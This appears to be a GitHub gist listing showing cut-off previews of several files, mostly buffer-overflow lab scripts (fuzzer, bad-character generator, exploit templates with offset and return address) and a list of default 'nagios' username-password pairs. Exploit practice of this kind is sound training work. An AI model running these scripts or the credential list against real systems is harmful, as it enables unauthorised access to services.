This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| ip = "10.10.172.142" | |
| port = 1337 | |
| prefix = "OVERFLOW2 " | |
| offset = 634 | |
| overflow = "A" * offset | |
| retn = "/xDF/x11/x50/x62" | |
| padding = "\x90" *16 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import print_function | |
| for x in range(1, 256): | |
| print("\\x" + "{:02x}".format(x), end='') | |
| print() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| ip = "MACHINE_IP" | |
| port = 1337 | |
| prefix = "OVERFLOW1 " | |
| offset = 0 | |
| overflow = "A" * offset | |
| retn = "" | |
| padding = "" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket, time, sys | |
| ip = "MACHINE_IP" | |
| port = 1337 | |
| timeout = 5 | |
| buffer = [] | |
| counter = 100 | |
| while len(buffer) < 30: | |
| buffer.append("A" * counter) |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nagios:123456 | |
| nagios:123456789 | |
| nagios:qwerty | |
| nagios:password | |
| nagios:111111 | |
| nagios:12345678 | |
| nagios:abc123 | |
| nagios:1234567 | |
| nagios:password1 | |
| nagios:12345 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import gzip | |
| import os | |
| import shutil | |
| import sys | |
| import threading | |
| def parse_input(): | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument('-target', nargs=1, required=True, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import smtplib | |
| import pyping | |
| error_msg = "Server is down!" | |
| Server_ping = pyping.ping('google.com') | |
| if Server_ping.ret_code == 0: | |
| print("Server is up!") | |
| else: | |
| mail=smtplib.SMTP('smtp.gmail.com',587) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import gzip | |
| import os | |
| import shutil | |
| import sys | |
| import threading | |
| def parse_input(): | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument('-target', nargs=1, required=True, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| extern printf | |
| section .data | |
| msg : db "Hey there!Welcome to my first ASM program",10,0 | |
| section .text | |
| global main | |
| main: |
NewerOlder